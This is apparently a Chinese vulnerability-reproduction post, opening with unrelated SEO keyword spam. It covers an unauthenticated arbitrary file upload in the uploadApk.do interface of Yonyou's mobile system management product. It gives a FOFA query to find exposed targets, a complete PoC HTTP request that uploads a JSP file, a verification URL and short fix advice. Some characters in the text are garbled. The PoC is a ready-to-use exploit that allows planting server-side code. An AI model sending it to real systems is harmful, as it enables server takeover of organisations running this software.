网站响应式是什么意思,高端娱乐网站建设,ps切片工具做网站,互利互通网站建设0x01 产品简介 用友移动系统管理是用友公司推出的一款移动办公解决方案#xff0c;旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具#xff0c;方便用户在移动设备上管理和处理企业的系统和业务。
0x02 漏洞概述 用友移动管理系统 uploa…0x01 产品简介 用友移动系统管理是用友公司推出的一款移动办公解决方案旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具方便用户在移动设备上管理和处理企业的系统和业务。
0x02 漏洞概述 用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞未经授权攻击者通过漏洞上传任意文件最终可以获取服务器权限。
0x03 复现环境
FOFAapp用友-移动系统管理 0x04 漏洞复现
PoC
POST /maportal/appmanager/uploadApk.do?pk_obj HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Type: multipart/form-data; boundary----WebKitFormBoundaryvLTG6zlX0gZ8LzO3------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; namedownloadpath; filenamea.jsp
Content-Type: application/mswordhello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3-- PS返还状态码必须是2,其他状态码不行
验证url
http://your-ip/maupload/apk/a.jsp
0x05 修复建议 关闭互联网暴露面或设置接口访问权限 升级至安全版本